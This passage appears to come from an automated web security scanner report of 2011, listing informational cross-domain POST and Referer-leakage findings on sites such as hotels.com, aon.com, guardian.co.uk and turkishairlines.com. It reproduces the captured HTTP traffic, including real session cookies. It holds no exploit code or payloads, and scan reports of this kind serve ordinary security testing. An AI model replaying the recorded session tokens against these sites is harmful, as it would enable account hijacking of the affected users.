mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A2.2.1%3A196.1.0%3A209.0.1%3A147.0.1.i6%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A195.0.0%3A104.0.1%7CHCOM_US; user=QSplbl9VU3xIQ09NX1VTIUQqMTg1LjAuMC5pMToxMTQuMS4wOjEyNC4xLjAuaTE6MTAzLjQuMS5pNjoxNzEuMS4wOjEzMC4xLjEuaTI6NDguMS4wOjk3LjczLjEuaTM6OTguNi40OjE0Mi4wLjAuaTQ6MTk4LjIuMDoxNDUuMC4wLmkyOjIwMC4wLjA6MTM3LjAuMC5pMjoxMDguMS4wLmkyOjE5MC4zLjA6MTUyLjAuMC5pMjoxMzQuMC4xOjIuMi4xOjE5Ni4xLjA6MjA5LjAuMToxNDcuMC4xLmk2OjkyLjAuMC5pMToxMzIuMi4wLmkyOjEyMS41MDMuMC5pNzoxMjIuMS4wLmkzOjEzOC4xLjA6MTQ5LjAuMC5pMToxOTUuMC4wOjEwNC4wLjF8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8Mg..

Response 1

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Cteonnt-Length: 152
Expect:
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Length: 152
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:17 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title></title></head><body><p></p></body></html>

Request 2

GET /html/blank.html HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_sv_sid=1011730152590; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSRT=oQGJTgA; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; s_cc=true; s_sq=%5B%5BB%5D%5D; SSLB=1; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A2.2.1%3A196.1.0%3A209.0.1%3A147.0.1.i6%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A195.0.0%3A104.0.1%7CHCOM_US; user=QSplbl9VU3xIQ09NX1VTIUQqMTg1LjAuMC5pMToxMTQuMS4wOjEyNC4xLjAuaTE6MTAzLjQuMS5pNjoxNzEuMS4wOjEzMC4xLjEuaTI6NDguMS4wOjk3LjczLjEuaTM6OTguNi40OjE0Mi4wLjAuaTQ6MTk4LjIuMDoxNDUuMC4wLmkyOjIwMC4wLjA6MTM3LjAuMC5pMjoxMDguMS4wLmkyOjE5MC4zLjA6MTUyLjAuMC5pMjoxMzQuMC4xOjIuMi4xOjE5Ni4xLjA6MjA5LjAuMToxNDcuMC4xLmk2OjkyLjAuMC5pMToxMzIuMi4wLmkyOjEyMS41MDMuMC5pNzoxMjIuMS4wLmkzOjEzOC4xLjA6MTQ5LjAuMC5pMToxOTUuMC4wOjEwNC4wLjF8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8Mg..

Response 2

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
ntCoent-Length: 152
Expect:
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Length: 152
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:22 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSID=BQAeUhsAAAAAAADiAYlOj_AAAuIBiU4BAAAAAAAAAAAA4gGJTgA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:29:22 GMT
Set-Cookie: SSSC=3.G5659056476975591567.1|0.0; path=/; domain=.hotels.com
Set-Cookie: SSRT=4gGJTgA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:29:22 GMT
Set-Cookie: SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:29:22 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title></title></head><body><p></p></body></html>

18. Cross-domain POST
There are 12 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


18.1. http://www.aon.com/site/products-services.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aon.com
Path:   /site/products-services.jsp

Issue detail

The page contains a form which POSTs data to the domain now.eloqua.com. The form contains the following fields:

Request

GET /site/products-services.jsp HTTP/1.1
Host: www.aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.aon.com/default.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FDA5F4B4BB1AB049D12027B006BB7DA5; s_pers=%20gpv_pageName%3D/default.jsp%7C1317601823485%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daoncomprod%253D%252526pid%25253D/default.jsp%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.aon.com/site/products-services.jsp%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Date: Mon, 03 Oct 2011 00:01:41 GMT
Content-Length: 97637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
</span>
           <form name="cform" action="http://now.eloqua.com/e/f2.aspx" method="post" id="cform" onsubmit="return validateForm()">
           <div class="contactform">
...[SNIP]...

18.2. http://www.aon.com/site/search.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aon.com
Path:   /site/search.jsp

Issue detail

The page contains a form which POSTs data to the domain now.eloqua.com. The form contains the following fields:

Request

GET /site/search.jsp?entqr=3&output=xml_no_dtd&entspa=a&sort=date%3AD%3AL%3Ad1&client=default_frontend&ud=1&oe=UTF-8&ie=UTF-8&OPN=RT1&num=5&start=0&site=AONCOM_ENGLISH&q=xss+txt+css+img+help+faq&x=7&y=9 HTTP/1.1
Host: www.aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.aon.com/site/products-services.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FDA5F4B4BB1AB049D12027B006BB7DA5; s_pers=%20gpv_pageName%3D/site/products-services.jsp%7C1317601842083%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daoncomprod%253D%252526pid%25253D/site/products-services.jsp%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.aon.com/siteImages/search_btn.gif%252526ot%25253DIMAGE%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Date: Mon, 03 Oct 2011 00:01:43 GMT
Content-Length: 83533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
</span>
           <form name="cform" action="http://now.eloqua.com/e/f2.aspx" method="post" id="cform" onsubmit="return validateForm()">
           <div class="contactform">
...[SNIP]...

18.3. http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /football/2011/sep/27/manchester-united-basel-live

Issue detail

The page contains a form which POSTs data to the domain www.guardianbookshop.co.uk. The form contains the following fields:

Request

GET /football/2011/sep/27/manchester-united-basel-live HTTP/1.1
Host: www.guardian.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDg2MjQxMTYzMTY1MzMyMzU2NTEwMjIxMTk2MjQ0MjAyMTgxNzExNjk3; s_pers=%20s_lv%3D1317599402360%7C1412207402360%3B%20s_lv_s%3DFirst%2520Visit%7C1317601202360%3B%20s_visit%3D1%7C1317601202363%3B%20c_dl%3D1%7C1317601202366%3B%20s_ev36_persist%3DDirect%2520Load%7C1318204202383%3B%20s_37_persist%3DDirect%2520Load%7C1318204202395%3B%20s_ev40%3D%255B%255B'Direct%252520Load'%252C'1317599402404'%255D%255D%7C1475452202404%3B%20gpv_pageName%3DManchester%2520United%253AKeyword%2520Page%253A589863%7C1317601202406%3B%20s_nr%3D1317599402415-New%7C1349135402415%3B; s_vi=[CS]v1|27447C5685010C0B-4000010320138FC1[CE]; OAX=Mhd7ak6I+K0ABUJY; OAX_tmp=4d686437616b36492b4b304142554a59; _publishflow=4galn0lq98x95vrg; member_type=0; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B%20s_ppv%3D27%3B; GU_ST=; rsi_segs=

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:57:55 GMT
Server: Apache
X-GU-jas: 54-23155
X-GU-PageRenderer: Hypercharger
Content-Type: text/html; charset=UTF-8
Set-Cookie: GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDg2MjQxMTYzMTY1MzMyMzU2NTEwMjIxMTk2MjQ0MjAyMTgxNzExNjk3; path=/; domain=.guardian.co.uk; expires=Sun, 23-Oct-2011 23:57:55 GMT
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 52
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Content-Length: 121369
Connection: close


<!DOCTYPE html><html lang="en">

<head>
                <script type="text/javascript" >
document.domain = "guardian.co.uk";

...[SNIP]...
</p>
    <form method="POST" action="http://www.guardianbookshop.co.uk/BerteShopWeb/search.do" name="QuickSearchForm">
    <input type="text" class="searchBox" value="" name="keyword">
...[SNIP]...

18.4. http://www.guardian.co.uk/football/manchester-united

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /football/manchester-united

Issue detail

The page contains a form which POSTs data to the domain www.guardianbookshop.co.uk. The form contains the following fields:

Request

GET /football/manchester-united HTTP/1.1
Host: www.guardian.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:50:53 GMT
Server: Apache
X-GU-jas: 57-21851
X-GU-PageRenderer: Hypercharger
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 52
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Content-Length: 91378
Connection: close


<!DOCTYPE html><html lang="en">

<head>

                <script type="text/javascript" >
document.domain = "guardian.co.uk";
...[SNIP]...
</p>
    <form method="POST" action="http://www.guardianbookshop.co.uk/BerteShopWeb/search.do" name="QuickSearchForm">
    <input type="text" class="searchBox" value="" name="keyword">
...[SNIP]...

18.5. http://www.sabreairlinesolutions.com/home/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /home/

Issue detail

The page contains a form which POSTs data to the domain emergo5.sabre.com. The form contains the following fields:

Request

GET /home/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabre.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618452; expires=Tue, 02-Oct-2012 00:07:32 GMT; path=/; domain=www.sabreairlinesolutions.com
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=www.sabreairlinesolutions.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:07:33 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15314


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<div id="login_container">
<form autocomplete="off" id="community_login" action="https://emergo5.sabre.com/amserver/UI/Login" name="community_login" method="post">
<p id="portal_sign_in">
...[SNIP]...

18.6. http://www.turkishairlines.com/en-CA/index.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /en-CA/index.aspx

Issue detail

The page contains a form which POSTs data to the domain www4.thy.com. The form contains the following fields:

Request

GET /en-CA/index.aspx HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.turkishairlines.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.1.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 79854


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...
<div class="miles radius-4px shadow-4px">

<form method="post" action="https://www4.thy.com/tkmiles/j_security_check?lang=en">
<input type="hidden" value="TK" id="tk" name="tk">
...[SNIP]...

18.7. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /en-CA/quick_search_part.aspx

Issue detail

The page contains a form which POSTs data to the domain www4.thy.com. The form contains the following fields:

Request

GET /en-CA/quick_search_part.aspx?p=checkin HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.2.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3203


<form id="step-2" action="https://www4.thy.com/onlinecheckin/checkpax.tk?lang=en" method="post" class="validate" rel="test">
<div class="title">Check-in</div>
<div class="quick_search-online">

...[SNIP]...

18.8. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /en-CA/quick_search_part.aspx

Issue detail

The page contains a form which POSTs data to the domain www4.thy.com. The form contains the following fields:

Request

GET /en-CA/quick_search_part.aspx?p=award HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.2.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:01:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1739

<form id="odulBiletLogin" name="tklogin" action="http://www4.thy.com/troyaonline/mainPageAwardStart.tk?lang=en" method="post">
<input type="hidden" value="TK" name="tk">
...[SNIP]...

18.9. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /en-CA/quick_search_part.aspx

Issue detail

The page contains a form which POSTs data to the domain www4.thy.com. The form contains the following fields:

Request

GET /en-CA/quick_search_part.aspx?p=arr HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.2.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:01:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8045


<form id="step-2" action="http://www4.thy.com/deparr/city.tk?lang=en" method="POST" name="cityForm">
<div class="">
<div class="title" style="margin-bottom: 5px;">Arrival Departure</div>
...[SNIP]...
<div class="radius-4px" id="fly-filter-airport-frm" style="margin-top:10px; display:none;">
<form action="http://www4.thy.com/deparr/airport.tk?lang=en" method="post" name="airportForm">
<div class="quick_search-schedule-order">
...[SNIP]...

18.10. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /en-CA/quick_search_part.aspx

Issue detail

The page contains a form which POSTs data to the domain www4.thy.com. The form contains the following fields:

Request

GET /en-CA/quick_search_part.aspx?p=arr HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.2.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:01:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8045


<form id="step-2" action="http://www4.thy.com/deparr/city.tk?lang=en" method="POST" name="cityForm">
<div class="">
<div class="title" style="margin-bottom: 5px;">Arrival Departure</div>
...[SNIP]...

18.11. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /en-CA/quick_search_part.aspx

Issue detail

The page contains a form which POSTs data to the domain www4.thy.com. The form contains the following fields:

Request

GET /en-CA/quick_search_part.aspx?p=schedule HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.2.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3532

<form id="formTarife" action="http://www4.thy.com/timetable/validateTimetablePage.tk?lang=en"    method="post">
<div class="title">Timetab
...[SNIP]...

18.12. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /en-CA/quick_search_part.aspx

Issue detail

The page contains a form which POSTs data to the domain www4.thy.com. The form contains the following fields:

Request

GET /en-CA/quick_search_part.aspx?p=arr HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.2.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:01:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8045


<form id="step-2" action="http://www4.thy.com/deparr/city.tk?lang=en" method="POST" name="cityForm">
<div class="">
<div class="title" style="margin-bottom: 5px;">Arrival Departure</div>
...[SNIP]...
<div class="radius-4px" id="fly-filter-fly-frm" style="margin-top:10px; display:none;">
<form action="http://www4.thy.com/deparr/flight.tk?lang=en" method="post" name="flightForm">
<input type="hidden" value="TK" name="tk">
...[SNIP]...

19. Cross-domain Referer leakage
There are 249 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


19.1. http://a.collective-media.net/cmadj/cm.guardian/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/cm.guardian/

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain; both are shown in the request and response below.

Request

GET /cmadj/cm.guardian/;sz=728x90;net=cm;ord=$random$;env=ifr;ord1=879803;cmpgurl=http%253A//www.guardian.co.uk/football/manchester-united? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
